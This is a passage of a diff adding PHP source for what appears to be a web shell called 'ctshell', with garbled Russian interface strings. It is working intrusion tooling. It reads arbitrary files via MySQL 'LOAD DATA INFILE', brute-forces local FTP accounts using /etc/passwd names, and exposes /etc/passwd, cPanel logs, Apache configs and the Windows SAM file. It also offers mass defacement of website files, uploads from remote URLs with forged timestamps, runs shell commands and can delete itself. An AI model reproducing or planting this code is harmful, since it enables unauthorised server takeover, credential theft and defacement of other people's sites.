+  if (!empty($kill)) {$query = 'KILL ' . $kill . ';'; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
+  $result = mysql_query("SHOW PROCESSLIST", $sql_sock); 
+  echo "<center><b>��������:</b><br><br>";
+  echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td>STATE</td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
+  while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
+  echo "</table>";
+  mysql_free_result($result);
+ }
+ elseif (($sql_act == "getfile"))
+ {
+  if (!mysql_create_db("tmp_bd")) {echo mysql_error();}
+  elseif (!mysql_select_db("tmp_bd")) {echo mysql_error();}
+  elseif (!mysql_query('CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );')) {echo mysql_error();}
+  else {mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); $query = "SELECT * FROM tmp_file"; $result = mysql_query($query); if (!$result) {echo "Error in query \"".$query."\": ".mysql_error();}
+  else
+  {
+for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
+$f = ""; 
+while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {foreach ($line as $key =>$col_value) {$f .= $col_value;}}
+if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b>";}
+else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f));}
+  }
+  mysql_free_result($result);
+  if (!mysql_drop_db("tmp_bd")) {echo ("Can't drop tempory DB \"tmp_bd\"!");}
+  }
+ }
+}
+  }
+ }
+ echo "</tr></table></table>";
+}
+if ($act == "mkdir")
+{
+ if ($mkdir != $d) {if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";} elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}}
+ echo "<br><br>";
+ $act = $dspact = "ls";
+}
+if ($act == "ftpquickbrute")
+{
+ echo "<b>Ftp Quick brute:</b><br>";
+ if ($win) {echo "This functions not work in Windows!<br><br>";}
+ else
+ {
+  function ctftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
+  {
+if ($fqb_onlywithsh)
+{
+ if (!in_array($sh,array("/bin/bash","/bin/sh","/usr/local/cpanel/bin/jailshell"))) {$true = false;}
+ else {$true = true;}
+}
+else {$true = true;}
+if ($true)
+{
+ $sock = @ftp_connect($host,$port,$timeout);
+ if (@ftp_login($sock,$login,$pass))
+ {
+  echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
+  ob_flush();
+  return true;
+ }
+}
+  }
+  if (!empty($submit))
+  {
+if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
+$fp = fopen("/etc/passwd","r");
+if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
+else
+{
+ ob_flush();
+ $i = $success = 0;
+ $ftpquick_st = getmicrotime();
+ while(!feof($fp))
+ { 
+  $str = explode(":",fgets($fp,2048));
+  if (ctftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
+  {
+$success++;
+  }
+  if ($i > $fqb_lenght) {break;}
+  $i++;
+ } 
+ if ($success == 0) {echo "No success. connections!";}
+ $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
+ echo "<hr size=\"1\" noshade><b>Done!<br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=\"green\"><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br><b>Connects per second: ".round($i/$ftpquick_t,2)."</b><br>";
+}
+  }
+  else {echo "<form method=\"POST\"><br>Read first: <input type=\"text\" name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br><input type=\"submit\" name=\"submit\" value=\"Brute\"></form>";}
+ }
+}
+if ($act == "lsa")
+{
+ echo "<center><b>���������� ������������ �������:</b></center>";
+ echo "<b>����������� �����������:</b> ".PHP_OS.", ".$SERVER_SOFTWARE."<br>";
+ echo "<b>������������: ".$hsafemode."</b><br>";
+ echo "<b>�������� �������� ��������: ".$hopenbasedir."</b><br>";
+ if (!$win)
+ {
+  if ($nixpasswd)
+  {
+if ($nixpasswd == 1) {$nixpasswd = 0;}
+$num = $nixpasswd + $nixpwdperpage;
+echo "<b>*nix /etc/passwd:</b><br>";
+$i = $nixpasswd;
+while ($i < $num)
+{
+ $uid = posix_getpwuid($i);
+ if ($uid) {echo join(":",$uid)."<br>";}
+ $i++;
+}
+  }
+  else {echo "<br><a href=\"".$sul."act=lsa&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}
+  if (file_get_contents("/etc/userdomains")) {echo "<b><font color=\"green\"><a href=\"".$sul."act=f&f=userdomains&d=/etc/&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
+  if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=\"green\"><a href=\"".$sul."act=f&f=accounting.log&d=/var/cpanel/&ft=txt\"><u><b>View cpanel logs</b></u></a></font></b><br>";}
+  if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=\"green\"><a href=\"".$sul."act=f&f=httpd.conf&d=/usr/local/apache/conf/&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+  if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=\"green\"><a href=\"".$sul."act=f&f=httpd.conf&d=/etc/&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+ }
+ else
+ {
+  $v = $_SERVER["WINDIR"]."\repair\sam";
+  if (file_get_contents($v)) {echo "<b><font color=\"red\">You can't crack winnt passwords(".$v.") </font></b><br>";}
+  else {echo "<b><font color=\"green\">�� ������ �������� winnt ������. <a href=\"".$sul."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>�������</b></u></a>, c ������������� lcp.crack+.</font></b><br>";}
+ }
+}
+if ($act == "mkfile")
+{
+ if ($mkfile != $d)
+ {
+  if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
+  elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
+  else {$act = "f"; $d = dirname($mkfile); if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} $f = basename($mkfile);}
+ }
+ else {$act = $dspact = "ls";}
+}
+if ($act == "fsbuff")
+{
+ $arr_copy = $sess_data["copy"];
+ $arr_cut = $sess_data["cut"];
+ $arr = array_merge($arr_copy,$arr_cut);
+ if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";}
+ else
+ {
+  echo "<b>File-System buffer</b><br><br>";
+  $ls_arr = $arr;
+  $disp_fullpath = true;
+  $act = "ls";
+ }
+}
+if ($act == "selfremove")
+{
+ if (!empty($submit))
+ {
+  if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using ctshell v.".$cv."!"; exit; }
+  else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
+ }
+ else
+ {
+  $v = array();
+  for($i=0;$i<8;$i++) {$v[] = "<a href=\"".$sul."\"><u><b>NO</b></u></a>";}
+  $v[] = "<a href=\"#\" onclick=\"if (confirm('Are you sure?')) document.location='".$sul."act=selfremove&submit=1';\"><u>YES</u></a>";
+  shuffle($v);
+  $v = join("&nbsp;&nbsp;&nbsp;",$v);
+  echo "<b>�����������: ".__FILE__." <br>�� ��������?</b><center>".$v."</center>";
+ }
+}
+if ($act == "massdeface")
+{
+ if (empty($deface_in)) {$deface_in = $d;}
+ if (empty($deface_name)) {$deface_name = "(.*)"; $deface_name_regexp = 1;}
+ if (empty($deface_text_wwo)) {$deface_text_regexp = 0;}
+
+ if (!empty($submit))
+ {
+  $found = array();
+  $found_d = 0;
+  $found_f = 0;
+
+  $text = $deface_text;
+  $text_regexp = $deface_text_regexp;
+  if (empty($text)) {$text = " "; $text_regexp = 1;}
+
+  $a = array
+  (
+"name"=>$deface_name, "name_regexp"=>$deface_name_regexp,
+"text"=>$text, "text_regexp"=>$text_regxp,
+"text_wwo"=>$deface_text_wwo,
+"text_cs"=>$deface_text_cs,
+"text_not"=>$deface_text_not
+  );
+  $defacetime = getmicrotime();
+  $in = array_unique(explode(";",$deface_in));
+  foreach($in as $v) {ctfsearch($v);}
+  $defacetime = round(getmicrotime()-$defacetime,4);
+  if (count($found) == 0) {echo "<b>No files found!</b>";}
+  else
+  {
+$ls_arr = $found;
+$disp_fullpath = true;
+$act = $dspact = "ls";
+  }
+ }
+ else
+ {
+  if (empty($deface_preview)) {$deface_preview = 1;}
+
+ }
+ echo "<form method=\"POST\">";
+ if (!$submit) {echo "<big><b>Attention! It's a very dangerous feature, you may lost your data.</b></big><br><br>";}
+ echo "<input type=\"hidden\" name=\"d\" value=\"".$dispd."\">
+<b>Deface for (file/directory name): </b><input type=\"text\" name=\"deface_name\" size=\"".round(strlen($deface_name)+25)."\" value=\"".htmlspecialchars($deface_name)."\">&nbsp;<input type=\"checkbox\" name=\"deface_name_regexp\" value=\"1\" ".gchds($deface_name_regexp,1," checked")."> - regexp
+<br><b>Deface in (explode \";\"): </b><input type=\"text\" name=\"deface_in\" size=\"".round(strlen($deface_in)+25)."\" value=\"".htmlspecialchars($deface_in)."\">
+<br><br><b>Search text:</b><br><textarea name=\"deface_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($deface_text)."</textarea>
+<br><br><input type=\"checkbox\" name=\"deface_text_regexp\" value=\"1\" ".gchds($deface_text_regexp,1," checked")."> - regexp
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_wwo\" value=\"1\" ".gchds($deface_text_wwo,1," checked")."> - <u>w</u>hole words only
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_cs\" value=\"1\" ".gchds($deface_text_cs,1," checked")."> - cas<u>e</u> sensitive
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_not\" value=\"1\" ".gchds($deface_text_not,1," checked")."> - find files <u>NOT</u> containing the text
+<br><input type=\"checkbox\" name=\"deface_preview\" value=\"1\" ".gchds($deface_preview,1," checked")."> - <b>PREVIEW AFFECTED FILES</b>
+<br><br><b>Html of deface:</b><br><textarea name=\"deface_html\" cols=\"122\" rows=\"10\">".htmlspecialchars($deface_html)."</textarea>
+<br><br><input type=\"submit\" name=\"submit\" value=\"Deface\"></form>";
+ if ($act == "ls") {echo "<hr size=\"1\" noshade><b>Deface took ".$defacetime." secs</b><br><br>";}
+}
+if ($act == "search")
+{
+ if (empty($search_in)) {$search_in = $d;}
+ if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
+ if (empty($search_text_wwo)) {$search_text_regexp = 0;}
+
+ if (!empty($submit))
+ {
+  $found = array();
+  $found_d = 0;
+  $found_f = 0;
+  $a = array
+  (
+"name"=>$search_name, "name_regexp"=>$search_name_regexp,
+"text"=>$search_text, "text_regexp"=>$search_text_regxp,
+"text_wwo"=>$search_text_wwo,
+"text_cs"=>$search_text_cs,
+"text_not"=>$search_text_not
+  );
+  $searchtime = getmicrotime();
+  $in = array_unique(explode(";",$search_in));
+  foreach($in as $v)
+  {
+ctfsearch($v);
+  }
+  $searchtime = round(getmicrotime()-$searchtime,4);
+  if (count($found) == 0) {echo "<b>No files found!</b>";}
+  else
+  {
+$ls_arr = $found;
+$disp_fullpath = true;
+$act = $dspact = "ls";
+  }
+ }
+ echo "<form method=\"POST\">
+<input type=\"hidden\" name=\"d\" value=\"".$dispd."\">
+<b>Search for (file/directory name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".gchds($search_name_regexp,1," checked")."> - regexp
+<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
+<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea>
+<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".gchds($search_text_regexp,1," checked")."> - regexp
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".gchds($search_text_wwo,1," checked")."> - <u>w</u>hole words only
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".gchds($search_text_cs,1," checked")."> - cas<u>e</u> sensitive
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".gchds($search_text_not,1," checked")."> - find files <u>NOT</u> containing the text
+<br><br><input type=\"submit\" name=\"submit\" value=\"Search\"></form>";
+ if ($act == "ls") {echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs</b><br><br>";}
+}
+if ($act == "chmod")
+{
+ $perms = fileperms($d.$f);
+ if (!$perms) {echo "Can't get current mode.";}
+ elseif ($submit)
+ {
+  if (!isset($owner[0])) {$owner[0] = 0;}
+  if (!isset($owner[1])) {$owner[1] = 0; }
+  if (!isset($owner[2])) {$owner[2] = 0;}
+  if (!isset($group[0])) {$group[0] = 0;}
+  if (!isset($group[1])) {$group[1] = 0;}
+  if (!isset($group[2])) {$group[2] = 0;}
+  if (!isset($world[0])) {$world[0] = 0;}
+  if (!isset($world[1])) {$world[1] = 0;}
+  if (!isset($world[2])) {$world[2] = 0;}
+  $sum_owner = $owner[0] + $owner[1] + $owner[2];
+  $sum_group = $group[0] + $group[1] + $group[2];
+  $sum_world = $world[0] + $world[1] + $world[2];
+  $sum_chmod = "0".$sum_owner.$sum_group.$sum_world;
+  $ret = @chmod($d.$f, $sum_chmod);
+  if ($ret) {$act = "ls";}
+  else {echo "<b>��������� ������� ����� (".$d.$f.")</b>: ������<br>";}
+ }
+ else
+ {
+  echo "<center><b>��������� ������� �����</b><br>";
+  $perms = view_perms(fileperms($d.$f));
+  $length = strlen($perms);
+  $owner_r = $owner_w = $owner_x =
+  $group_r = $group_w = $group_x = 
+  $world_r = $world_w = $group_x = "";
+
+  if ($perms[1] == "r") {$owner_r = " checked";} if ($perms[2] == "w") {$owner_w = " checked";}
+  if ($perms[3] == "x") {$owner_x = " checked";} if ($perms[4] == "r") {$group_r = " checked";}
+  if ($perms[5] == "w") {$group_w = " checked";} if ($perms[6] == "x") {$group_x = " checked";}
+  if ($perms[7] == "r") {$world_r = " checked";} if ($perms[8] == "w") {$world_w = " checked";}
+ if ($perms[9] == "x") {$world_x = " checked";}
+  echo "<form method=\"POST\"><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value='".htmlspecialchars($f)."'>
+<input type=hidden name=act value=chmod><input type=hidden name=submit value=1><input type=hidden name='owner[3]' value=no_error>
+<input type=hidden name='group[3]' value=no_error><input type=hidden name='world[3]' value=no_error>
+<table class=table1><tr><td class=td2><table class=table1 align=center width=300 border=0 cellspacing=0 cellpadding=5><tr><td class=td2><b>Owner</b><br><br>
+<input type=checkbox NAME=owner[0] value=4".$owner_r.">Read<br><input type=checkbox NAME=owner[1] value=2".$owner_w.">Write<br>
+<input type=checkbox NAME=owner[2] value=1".$owner_x.">Execute</font></td><td class=td2><b>Group</b><br><br>
+<input type=checkbox NAME=group[0] value=4".$group_r.">Read<br>
+<input type=checkbox NAME=group[1] value=2".$group_w.">Write<br>
+<input type=checkbox NAME=group[2] value=1".$group_x.">Execute</font></td>
+<td class=td2><b>World</b><br><br><input type=checkbox NAME=world[0] value=4".$world_r.">Read<br>
+<input type=checkbox NAME=world[1] value=2".$world_w.">Write<br>
+<input type=checkbox NAME=world[2] value=1".$world_x.">Execute</font></td>
+</tr></table></td></tr><tr align=center><td><input type=submit name=chmod value=\"���������\"></td></tr></table></FORM></center>";
+ }
+}
+if ($act == "upload")
+{
+ $uploadmess = "";
+ $uploadpath = str_replace("\\","/",$uploadpath);
+ if (empty($uploadpath)) {$uploadpath = $d;}
+ elseif (substr($uploadpath,strlen($uploadpath)-1,1) != "/") {$uploadpath .= "/";}
+ if (!empty($submit))
+ {
+  global $HTTP_POST_FILES;
+  $uploadfile = $HTTP_POST_FILES["uploadfile"];
+  if (!empty($uploadfile[tmp_name]))
+  {
+if (empty($uploadfilename)) {$destin = $uploadfile[name];}
+else {$destin = $userfilename;}
+if (!move_uploaded_file($uploadfile[tmp_name],$uploadpath.$destin)) {$uploadmess .= "������, ����������� ���� ".$uploadfile[name]." (�� ����� ����������� \"".$uploadfile[tmp_name]."\" �� \"".$uploadpath.$destin."\"!<br>";}
+  }
+  elseif (!empty($uploadurl))
+  {
+if (!empty($uploadfilename)) {$destin = $uploadfilename;}
+else
+{
+ $destin = explode("/",$destin);
+ $destin = $destin[count($destin)-1];
+ if (empty($destin))
+ {
+  $i = 0;
+  $b = "";
+  while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
+}
+if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}
+else
+{
+ $st = getmicrotime();
+ $content = @file_get_contents($uploadurl);
+ $dt = round(getmicrotime()-$st,4);
+ if (!$content) {$uploadmess .=  "�� ����� ��������� ����!<br>";}
+ else
+ {
+  if ($filestealth) {$stat = stat($uploadpath.$destin);}
+  $fp = fopen($uploadpath.$destin,"w");
+  if (!$fp) {$uploadmess .= "������, ������� ����� ".htmlspecialchars($destin)."!<br>";}
+  else
+  {
+fwrite($fp,$content,strlen($content));
+fclose($fp);
+if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
+  }
+ }
+}
+  }
+ }
+ if ($miniform)
+ {
+  echo "<b>".$uploadmess."</b>";
+  $act = "ls";
+ }
+ else
+ {
+  echo "<b>�������� �����:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$sul."act=upload&d=".urlencode($d)."\" method=\"POST\">
+��������� ����: <br><input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;���<br>
+��������� �� URL: <br><input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br>
+��������� ���� ����� � �����: <br><input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br>
+��� �����: <br><input name=uploadfilename size=25>
+<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;�������������� ��� �����<br><br>
+<input type=\"submit\" name=\"submit\" value=\"���������\">
+</form>";
+ }
+}
+if ($act == "delete")
+{
+ $delerr = "";
+ foreach ($actbox as $v)
+ {
+  $result = false;
+  $result = fs_rmobj($v);
+  if (!$result) {$delerr .= "�� ����� ������� ".htmlspecialchars($v)."<br>";}
+  if (!empty($delerr)) {echo "<b>�������� � ��������:</b><br>".$delerr;}
+ }
+ $act = "ls";
+}
+if ($act == "onedelete")
+{
+ $delerr = "";
+  $result = false;
+  $result = fs_rmobj($f);
+  if (!$result) {$delerr .= "�� ����� ������� ".htmlspecialchars($f)."<br>";}
+  if (!empty($delerr)) {echo "<b>�������� � ��������:</b><br>".$delerr;}
+ $act = "ls";
+}
+if ($act == "onedeleted")
+{
+ $delerr = "";
+  $result = false;
+  $result = fs_rmobj($d+'/'+$f);
+  if (!$result) {$delerr .= "�� ����� ������� ".htmlspecialchars($f)."<br>";}
+  if (!empty($delerr)) {echo "<b>�������� � ��������:</b><br>".$delerr;}
+ $act = "ls";
+}
+if ($act == "deface")
+{
+ $deferr = "";
+ foreach ($actbox as $v)
+ {
+  $data = $deface_html;
+  if (eregi("%%%filedata%%%",$data)) {$data = str_replace("%%%filedata%%%",file_get_contents($v),$data);}
+  $data = str_replace("%%%filename%%%",basename($v),$data);
+  $data = str_replace("%%%filepath%%%",$v,$data);
+  $fp = @fopen($v,"w");
+  fwrite($fp,$data);
+  fclose($fp);
+  if (!$result) {$deferr .= "Can't deface ".htmlspecialchars($v)."<br>";}
+  if (!empty($delerr)) {echo "<b>Defacing with errors:</b><br>".$deferr;}
+ }
+}
+if (!$usefsbuff)
+{
+ if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"USEFSBUFF\" as TRUE.</center>";}
+}
+else
+{
+ if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); ct_sess_put($sess_data); $act = "ls";}
+ if ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); ct_sess_put($sess_data); $act = "ls";}
+ if ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} $ls_arr = array_merge($sess_data["copy"],$sess_data["cut"]); ct_sess_put($sess_data); $act = "ls";}
+ 
+ if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); ct_sess_put($sess_data);}
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+$to = $d.basename($v);
+if (!fs_copy_obj($v,$d)) {$psterr .= "�� ����� ����������� ".$v." to ".$to."!<br>";}
+if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+$to = $d.basename($v);
+if (!fs_move_obj($v,$d)) {$psterr .= "�� ����� ������������� ".$v." to ".$to."!<br>";}
+unset($sess_data["cut"][$k]);
+  }
+  ct_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>������������ � ��������:</b><br>".$psterr;}
+  $act = "ls";
+ }
+ elseif ($actarcbuff)
+ {
+  $arcerr = "";
+  if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
+  else {$ext = ".tar.gz";}
+  
+  if ($ext == ".tar.gz")
+  {
+$cmdline = "tar cfzv";
+  }
+  $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
+  foreach($objects as $v)
+  {
+$v = str_replace("\\","/",$v);
+if (is_dir($v))
+{
+ if (substr($v,strlen($v)-1,strlen($v)) != "/") {$v .= "/";}
+ $v .= "*";
+}
+$cmdline .= " ".$v;
+  }
+  $ret = `$cmdline`;
+  if (empty($ret)) {$arcerr .= "�� ����� ������� archivator!<br>";}
+  $ret = str_replace("\r\n","\n");
+  $ret = explode("\n",$ret);
+  if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+if (in_array($v,$ret)) {fs_rmobj($v);}
+unset($sess_data["cut"][$k]);
+  }
+  ct_sess_put($sess_data);
+  if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
+  $act = "ls";
+ }
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+$to = $d.basename($v);
+if (!fs_copy_obj($v,$d)) {$psterr .= "�� ����� ����������� ".$v." to ".$to."!<br>";}
+if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+$to = $d.basename($v);
+if (!fs_move_obj($v,$d)) {$psterr .= "�� ����� ������������� ".$v." to ".$to."!<br>";}
+unset($sess_data["cut"][$k]);
+  }
+  ct_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>������������ � ��������:</b><br>".$psterr;}
+  $act = "ls";
+ }
+}
+if ($act == "ls")
+{
+ if (count($ls_arr) > 0) {$list = $ls_arr;}
+ else
+ {
+  $list = array();
+  if ($h = @opendir($d))
+  {
+while ($o = readdir($h)) {$list[] = $d.$o;}
+closedir($h);
+  }
+ }
+ if (count($list) == 0) {echo "<center><b>�� ����� ������� ���������� (".htmlspecialchars($d).")!</b></center>";}
+ else
+ {
+  $tab = array();
+  $amount = count($ld)+count($lf);
+  $vd = "f"; 
+  if ($vd == "f")
+  {
+$row = array();
+$row[] = "<b><center>���</b>";
+$row[] = "<b><center>������</center></b>";
+$row[] = "<b><center>�������</center></b>";
+if (!$win)
+  {$row[] = "<b><center>��������/������</center></b>";}
+$row[] = "<b><center>�����</center></b>";
+$row[] = "<b><center>�������</center></b>";
+
+$k = $sort[0];
+if ((!is_numeric($k)) or ($k > count($row)-2)) {$k = 0;}
+if (empty($sort[1])) {$sort[1] = "d";}
+if ($sort[1] != "a")
+{
+ $y = "<a href=\"".$sul."act=".$dspact."&d=".urlencode($d)."&sort=".$k."a\"><img src=\"".$sul."act=img&img=sort_desc\" border=\"0\"></a></center>";
+}
+else
+{
+ $y = "<a href=\"".$sul."act=".$dspact."&d=".urlencode($d)."&sort=".$k."d\"><img src=\"".$sul."act=img&img=sort_asc\" border=\"0\"></a></center>";
+}
+
+$row[$k] .= $y;
+for($i=0;$i<count($row)-1;$i++)
+{
+ if ($i != $k) {$row[$i] = "<a href=\"".$sul."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$sort[1]."\">".$row[$i]."</a>";}
+}
+
+$tab = array();
+$tab[cols] = array($row);
+$tab[head] = array();
+$tab[dirs] = array();
+$tab[links] = array();
+$tab[files] = array();
+
+foreach ($list as $v)
+{
+ $o = basename($v);
+ $dir = dirname($v);
+  
+ if ($disp_fullpath) {$disppath = $v;}
+ else {$disppath = $o;}
+ $disppath = str2mini($disppath,60);
+  
+ if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
+ elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
+
+ $uo = urlencode($o);
+ $ud = urlencode($dir);
+ $uv = urlencode($v);
+
+ $row = array();
+
+if (is_dir($v))
+ {
+  if (is_link($v)) {$disppath .= " => ".readlink($v); $type = "LINK";}
+  else {$type = "DIR";}
+  $row[] =  "<a href=\"".$sul."act=ls&d=".$uv."&sort=".$sort."\"> <img src=\"".$sul."act=img&img=small_dir\" height=\"16\" width=\"16\" border=\"0\">&nbsp; ".$disppath."</a>";
+  $row[] = $type;
+ }
+ elseif(is_file($v))
+ {
+  $ext = explode(".",$o);
+  $c = count($ext)-1;
+  $ext = $ext[$c];
+  $ext = strtolower($ext);
+  $row[] =  "<a href=\"".$sul."act=f&f=".$uo."&d=".$ud."&\"><img src=\"".$sul."act=img&img=ext_".$ext."\" height=\"16\" width=\"16\" border=\"0\">&nbsp; ".$disppath."</a>";
+  $row[] = view_size(filesize($v));
+ }
+ $row[] = "<center>".date("d.m.Y H:i:s",filemtime($v))."</center>";
+  
+ if (!$win)
+ {
+  $ow = @posix_getpwuid(fileowner($v));
+  $gr = @posix_getgrgid(filegroup($v));
+  $row[] = "<center>".$ow["name"]."/".$gr["name"]."</center>";
+ }
+
+ if (is_writable($v)) {$row[] = "<a href=\"".$sul."act=chmod&f=".$uo."&d=".$ud."\">".view_perms(fileperms($v))."</a>";}
+ else {$row[] = "<a href=\"".$sul."act=chmod&f=".$uo."&d=".$ud."\"><font color=\"red\">".view_perms(fileperms($v))."</font></a>";}
+
+ if (is_dir($v)) {$row[] = "&nbsp;<input type=\"checkbox\" name=\"actbox[]\" value=\"".htmlspecialchars($v)."\">&nbsp;<a href=\"".$sul."act=onedeleted&f=".$uo."&d=".$ud."\"><img src=\"".$sul."act=img&img=odel\" title=\"Delete\" height=\"16\" width=\"19\" border=\"0\"></a>";}
+ else {$row[] = "&nbsp;<input type=\"checkbox\" name=\"actbox[]\" value=\"".htmlspecialchars($v)."\">&nbsp;<a href=\"".$sul."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$sul."act=img&img=change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$sul."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$sul."act=img&img=download\" title=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$sul."act=onedelete&f=".$uo."&d=".$ud."\"><img src=\"".$sul."act=img&img=odel\" title=\"Delete\" height=\"16\" width=\"19\" border=\"0\"></a>";}
+
+ if (($o == ".") or ($o == "..")) {$tab[head][] = $row;}
+ elseif (is_link($v)) {$tab[links][] = $row;}
+ elseif (is_dir($v)) {$tab[dirs][] = $row;}
+ elseif (is_file($v)) {$tab[files][] = $row;}
+}
+  }
+  $v = $sort[0];
+  function tabsort($a, $b)
+  {
+global $v;
+return strnatcasecmp(strip_tags($a[$v]), strip_tags($b[$v]));
+  }
+  usort($tab[dirs], "tabsort");
+  usort($tab[files], "tabsort");
+  if ($sort[1] == "a")
+  {
